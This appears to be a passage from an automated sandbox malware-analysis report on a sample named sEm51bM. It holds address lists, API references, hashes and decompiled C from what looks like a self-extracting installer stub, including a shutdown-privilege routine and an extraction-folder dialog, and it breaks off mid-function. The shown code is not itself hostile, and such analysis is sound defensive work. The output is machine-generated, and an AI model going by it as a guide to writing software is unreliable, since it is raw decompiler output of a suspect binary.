                                                                                                                                                                                                                                            0x00321f58
                                                                                                                                                                                                                                            0x00321f60
                                                                                                                                                                                                                                            0x00321f61
                                                                                                                                                                                                                                            0x00321f62
                                                                                                                                                                                                                                            0x00321f75
                                                                                                                                                                                                                                            0x00321f80
                                                                                                                                                                                                                                            0x00321f77
                                                                                                                                                                                                                                            0x00321f77
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321f77
                                                                                                                                                                                                                                            0x00321f64
                                                                                                                                                                                                                                            0x00321f64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321f64
                                                                                                                                                                                                                                            0x00321f0e
                                                                                                                                                                                                                                            0x00321f0e
                                                                                                                                                                                                                                            0x00321f13
                                                                                                                                                                                                                                            0x00321f13
                                                                                                                                                                                                                                            0x00321f14
                                                                                                                                                                                                                                            0x00321f14
                                                                                                                                                                                                                                            0x00321f16
                                                                                                                                                                                                                                            0x00321f17
                                                                                                                                                                                                                                            0x00321f1a
                                                                                                                                                                                                                                            0x00321f1f
                                                                                                                                                                                                                                            0x00321f1f
                                                                                                                                                                                                                                            0x00321f86
                                                                                                                                                                                                                                            0x00321f8f
                                                                                                                                                                                                                                            0x00321fcf
                                                                                                                                                                                                                                            0x00321fd3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321fd3
                                                                                                                                                                                                                                            0x00321fa9
                                                                                                                                                                                                                                            0x00321fb4
                                                                                                                                                                                                                                            0x00321fbb
                                                                                                                                                                                                                                            0x00321fc3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321fc3
                                                                                                                                                                                                                                            0x00321f9a
                                                                                                                                                                                                                                            0x00321f9a
                                                                                                                                                                                                                                            0x00321fa2
                                                                                                                                                                                                                                            0x00321fd9
                                                                                                                                                                                                                                            0x00321fda
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321fa2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00321EFB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00321F02
                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00321FD3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                            • Opcode ID: 08e7aa4e878d3d63de9275158213f97d1bc748a31785469ce3f9c45994e42420
                                                                                                                                                                                                                                            • Instruction ID: 70571a11984e137d6e7afe68c4cfd9c6a6969acdbfadb716f7320e736c23a3f4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08e7aa4e878d3d63de9275158213f97d1bc748a31785469ce3f9c45994e42420
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8212B71B402257BDB329BA1BE4AFBF77BCEB95B10F21011DFA02E6180D77488029261
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00326CF0(char _a4) {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                            				_t1 =  &_a4; // 0x326e26
                                                                                                                                                                                                                                            				UnhandledExceptionFilter( *_t1);
                                                                                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00326cf7
                                                                                                                                                                                                                                            0x00326cfd
                                                                                                                                                                                                                                            0x00326d00
                                                                                                                                                                                                                                            0x00326d19

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00326E26,00321000), ref: 00326CF7
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(&n2,?,00326E26,00321000), ref: 00326D00
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,00326E26,00321000), ref: 00326D0B
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00326E26,00321000), ref: 00326D12
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                            • String ID: &n2
                                                                                                                                                                                                                                            • API String ID: 3231755760-4029215977
                                                                                                                                                                                                                                            • Opcode ID: 4ba6407e662acddad4c1473e096f5206c5f1cf87b4b0e9070008eb175266a939
                                                                                                                                                                                                                                            • Instruction ID: c6b2dbee57fe7ad9a045ad82799739b3511dc6bc9ac18e908a1e29c0b159fafb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ba6407e662acddad4c1473e096f5206c5f1cf87b4b0e9070008eb175266a939
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61D0C932004908BBEB222BE1EC0CA593F2CEB48333F444008F31A82020CB3264628B52
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                                            			E00323210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				int _t20;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				int _t23;
                                                                                                                                                                                                                                            				char _t24;
                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				int _t38;
                                                                                                                                                                                                                                            				int _t39;
                                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				CHAR* _t49;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t64;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                                                                                                            				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                            					EndDialog(_t64, ??);
                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 = 1;
                                                                                                                                                                                                                                            				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                            				if(_t10 == 0) {
                                                                                                                                                                                                                                            					E003243D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                            					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                                                            					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                            					__eflags =  *0x329a40 - _t42; // 0x3
                                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                                            						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L36:
                                                                                                                                                                                                                                            					return _t42;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t10 == _t42) {
                                                                                                                                                                                                                                            					_t20 = _a12 - 1;
                                                                                                                                                                                                                                            					__eflags = _t20;
                                                                                                                                                                                                                                            					if(_t20 == 0) {
                                                                                                                                                                                                                                            						_t21 = GetDlgItemTextA(_t64, 0x835, 0x3291e4, 0x104);
                                                                                                                                                                                                                                            						__eflags = _t21;
                                                                                                                                                                                                                                            						if(_t21 == 0) {
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							_t58 = 0x4bf;
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							E003244B9(_t64, _t58);
                                                                                                                                                                                                                                            							goto L39;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t49 = 0x3291e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t23 =  *_t49;
                                                                                                                                                                                                                                            							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                            							__eflags = _t23;
                                                                                                                                                                                                                                            						} while (_t23 != 0);
                                                                                                                                                                                                                                            						__eflags = _t49 - 0x3291e5 - 3;
                                                                                                                                                                                                                                            						if(_t49 - 0x3291e5 < 3) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 =  *0x3291e5; // 0x3a
                                                                                                                                                                                                                                            						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                            						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                            							L21:
                                                                                                                                                                                                                                            							_t25 = GetFileAttributesA(0x3291e4);
                                                                                                                                                                                                                                            							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                            							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            								L26:
                                                                                                                                                                                                                                            								E0032658A(0x3291e4, 0x104, 0x321140);
                                                                                                                                                                                                                                            								_t27 = E003258C8(0x3291e4);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 != 0) {
                                                                                                                                                                                                                                            									__eflags =  *0x3291e4 - 0x5c;
                                                                                                                                                                                                                                            									if( *0x3291e4 != 0x5c) {
                                                                                                                                                                                                                                            										L30:
                                                                                                                                                                                                                                            										_t30 = E0032597D(0x3291e4, 1, _t64, 1);
                                                                                                                                                                                                                                            										__eflags = _t30;
                                                                                                                                                                                                                                            										if(_t30 == 0) {
                                                                                                                                                                                                                                            											L35:
                                                                                                                                                                                                                                            											_t42 = 1;
                                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                                            											goto L36;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t42 = 1;
                                                                                                                                                                                                                                            										EndDialog(_t64, 1);
                                                                                                                                                                                                                                            										goto L36;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0x3291e5 - 0x5c;
                                                                                                                                                                                                                                            									if( *0x3291e5 == 0x5c) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L30;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t58 = 0x4be;
                                                                                                                                                                                                                                            								goto L25;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t32 = E003244B9(_t64, 0x54a, 0x3291e4, 0, 0x20, 4);
                                                                                                                                                                                                                                            							__eflags = _t32 - 6;
                                                                                                                                                                                                                                            							if(_t32 != 6) {
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t33 = CreateDirectoryA(0x3291e4, 0);
                                                                                                                                                                                                                                            							__eflags = _t33;
                                                                                                                                                                                                                                            							if(_t33 != 0) {
                                                                                                                                                                                                                                            								goto L26;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x3291e4);
                                                                                                                                                                                                                                            							_t58 = 0x4cb;
                                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags =  *0x3291e4 - 0x5c;
                                                                                                                                                                                                                                            						if( *0x3291e4 != 0x5c) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                            						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t34 = _t20 - 1;
                                                                                                                                                                                                                                            					__eflags = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						EndDialog(_t64, 0);
                                                                                                                                                                                                                                            						 *0x329124 = 0x800704c7;
                                                                                                                                                                                                                                            						goto L39;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                            					if(_t34 != 0x834) {
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t37 = LoadStringA( *0x329a3c, 0x3e8, 0x328598, 0x200);
                                                                                                                                                                                                                                            					__eflags = _t37;
                                                                                                                                                                                                                                            					if(_t37 != 0) {
                                                                                                                                                                                                                                            						_t38 = E00324224(_t64, _t46, _t46);
                                                                                                                                                                                                                                            						__eflags = _t38;
                                                                                                                                                                                                                                            						if(_t38 == 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t39 = SetDlgItemTextA(_t64, 0x835, 0x3287a0);
                                                                                                                                                                                                                                            						__eflags = _t39;
                                                                                                                                                                                                                                            						if(_t39 != 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t63 = 0x4c0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						E003244B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L38;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = 0x4b1;
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                            0x0032321b
                                                                                                                                                                                                                                            0x0032321e
                                                                                                                                                                                                                                            0x00323221
                                                                                                                                                                                                                                            0x0032343c
                                                                                                                                                                                                                                            0x0032343e
                                                                                                                                                                                                                                            0x0032343f
                                                                                                                                                                                                                                            0x00323445
                                                                                                                                                                                                                                            0x00323447
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323447
                                                                                                                                                                                                                                            0x00323229
                                                                                                                                                                                                                                            0x0032322a
                                                                                                                                                                                                                                            0x0032322f
                                                                                                                                                                                                                                            0x003233ec
                                                                                                                                                                                                                                            0x003233f7
                                                                                                                                                                                                                                            0x00323410
                                                                                                                                                                                                                                            0x00323416
                                                                                                                                                                                                                                            0x0032341d
                                                                                                                                                                                                                                            0x0032342d
                                                                                                                                                                                                                                            0x0032342d
                                                                                                                                                                                                                                            0x00323438
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323438
                                                                                                                                                                                                                                            0x00323237
                                                                                                                                                                                                                                            0x00323243
                                                                                                                                                                                                                                            0x00323243
                                                                                                                                                                                                                                            0x00323246
                                                                                                                                                                                                                                            0x003232ee
                                                                                                                                                                                                                                            0x003232f4
                                                                                                                                                                                                                                            0x003232f6
                                                                                                                                                                                                                                            0x003233d4
                                                                                                                                                                                                                                            0x003233d6
                                                                                                                                                                                                                                            0x003233db
                                                                                                                                                                                                                                            0x003233dc
                                                                                                                                                                                                                                            0x003233de
                                                                                                                                                                                                                                            0x003233df
                                                                                                                                                                                                                                            0x00323370
                                                                                                                                                                                                                                            0x00323372
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323372
                                                                                                                                                                                                                                            0x003232fc
                                                                                                                                                                                                                                            0x00323301
                                                                                                                                                                                                                                            0x00323301
                                                                                                                                                                                                                                            0x00323303
                                                                                                                                                                                                                                            0x00323304
                                                                                                                                                                                                                                            0x00323304
                                                                                                                                                                                                                                            0x0032330a
                                                                                                                                                                                                                                            0x0032330d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323313
                                                                                                                                                                                                                                            0x00323318
                                                                                                                                                                                                                                            0x0032331a
                                                                                                                                                                                                                                            0x00323331
                                                                                                                                                                                                                                            0x00323332
                                                                                                                                                                                                                                            0x0032333a
                                                                                                                                                                                                                                            0x0032333d
                                                                                                                                                                                                                                            0x0032337c
                                                                                                                                                                                                                                            0x00323388
                                                                                                                                                                                                                                            0x0032338f
                                                                                                                                                                                                                                            0x00323394
                                                                                                                                                                                                                                            0x00323396
                                                                                                                                                                                                                                            0x003233a4
                                                                                                                                                                                                                                            0x003233ab
                                                                                                                                                                                                                                            0x003233b6
                                                                                                                                                                                                                                            0x003233be
                                                                                                                                                                                                                                            0x003233c3
                                                                                                                                                                                                                                            0x003233c5
                                                                                                                                                                                                                                            0x00323435
                                                                                                                                                                                                                                            0x00323437
                                                                                                                                                                                                                                            0x00323437
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323437
                                                                                                                                                                                                                                            0x003233c7
                                                                                                                                                                                                                                            0x003233c9
                                                                                                                                                                                                                                            0x003233cc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003233cc
                                                                                                                                                                                                                                            0x003233ad
                                                                                                                                                                                                                                            0x003233b4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003233b4
                                                                                                                                                                                                                                            0x00323398
                                                                                                                                                                                                                                            0x00323399
                                                                                                                                                                                                                                            0x0032339b
                                                                                                                                                                                                                                            0x0032339c
                                                                                                                                                                                                                                            0x0032339d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032339d
                                                                                                                                                                                                                                            0x0032334c
                                                                                                                                                                                                                                            0x00323351
                                                                                                                                                                                                                                            0x00323354
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032335c
                                                                                                                                                                                                                                            0x00323362
                                                                                                                                                                                                                                            0x00323364
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323366
                                                                                                                                                                                                                                            0x00323367
                                                                                                                                                                                                                                            0x00323369
                                                                                                                                                                                                                                            0x0032336a
                                                                                                                                                                                                                                            0x0032336b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032336b
                                                                                                                                                                                                                                            0x0032331c
                                                                                                                                                                                                                                            0x00323323
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323329
                                                                                                                                                                                                                                            0x0032332b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032332b
                                                                                                                                                                                                                                            0x0032324c
                                                                                                                                                                                                                                            0x0032324c
                                                                                                                                                                                                                                            0x0032324f
                                                                                                                                                                                                                                            0x003232c8
                                                                                                                                                                                                                                            0x003232ce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003232ce
                                                                                                                                                                                                                                            0x00323251
                                                                                                                                                                                                                                            0x00323256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323271
                                                                                                                                                                                                                                            0x00323277
                                                                                                                                                                                                                                            0x00323279
                                                                                                                                                                                                                                            0x00323298
                                                                                                                                                                                                                                            0x0032329d
                                                                                                                                                                                                                                            0x0032329f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003232b0
                                                                                                                                                                                                                                            0x003232b6
                                                                                                                                                                                                                                            0x003232b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003232be
                                                                                                                                                                                                                                            0x00323280
                                                                                                                                                                                                                                            0x00323289
                                                                                                                                                                                                                                            0x0032328e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032328e
                                                                                                                                                                                                                                            0x0032327b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032327b
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000003E8,00328598,00000200), ref: 00323271
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 003233E2
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 003233F7
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00323410
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000836), ref: 00323426
                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 0032342D
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 0032343F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$cent
                                                                                                                                                                                                                                            • API String ID: 2418873061-481508614
                                                                                                                                                                                                                                            • Opcode ID: 2a5bf9f7b9a309132953cea4ca9135625270224167b44e941cf7b5d642049852
                                                                                                                                                                                                                                            • Instruction ID: f9427a57b481d1aa395ea89d47040ca6bd89dbcd109c270b57b12939f1730ac9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a5bf9f7b9a309132953cea4ca9135625270224167b44e941cf7b5d642049852
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99512630341370BBEB33AB367C4DF7B2A4D9B46B54F504429F645965C1CABC9B0292A2
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00322CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				struct HRSRC__* _t31;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t13 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                            				_t65 = 0;
                                                                                                                                                                                                                                            				_t66 = __ecx;
                                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                                            				 *0x329a3c = __ecx;
                                                                                                                                                                                                                                            				memset(0x329140, 0, 0x8fc);
                                                                                                                                                                                                                                            				memset(0x328a20, 0, 0x32c);
                                                                                                                                                                                                                                            				memset(0x3288c0, 0, 0x104);
                                                                                                                                                                                                                                            				 *0x3293ec = 1;
                                                                                                                                                                                                                                            				_t20 = E0032468F("TITLE", 0x329154, 0x7f);
                                                                                                                                                                                                                                            				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                            					_t64 = 0x4b1;
                                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                            					 *0x32858c = _t27;
                                                                                                                                                                                                                                            					SetEvent(_t27);
                                                                                                                                                                                                                                            					_t64 = 0x329a34;
                                                                                                                                                                                                                                            					if(E0032468F("EXTRACTOPT", 0x329a34, 4) != 0) {
                                                                                                                                                                                                                                            						if(( *0x329a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                            							 *0x329120 =  *0x329120 & _t65;
                                                                                                                                                                                                                                            							if(E00325C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                            								if( *0x328a3a == 0) {
                                                                                                                                                                                                                                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                            									if(_t31 != 0) {
                                                                                                                                                                                                                                            										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0x328184 != 0) {
                                                                                                                                                                                                                                            										__imp__#17();
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0x328a24 == 0) {
                                                                                                                                                                                                                                            										_t57 = _t65;
                                                                                                                                                                                                                                            										if(E003236EE(_t65) == 0) {
                                                                                                                                                                                                                                            											goto L33;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t33 =  *0x329a40; // 0x3
                                                                                                                                                                                                                                            											_t48 = 1;
                                                                                                                                                                                                                                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                            												if(( *0x329a34 & 0x00000100) == 0 || ( *0x328a38 & 0x00000001) != 0 || E003218A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t64 = 0x7d6;
                                                                                                                                                                                                                                            													if(E00326517(_t57, 0x7d6, _t34, E003219E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                            														goto L33;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
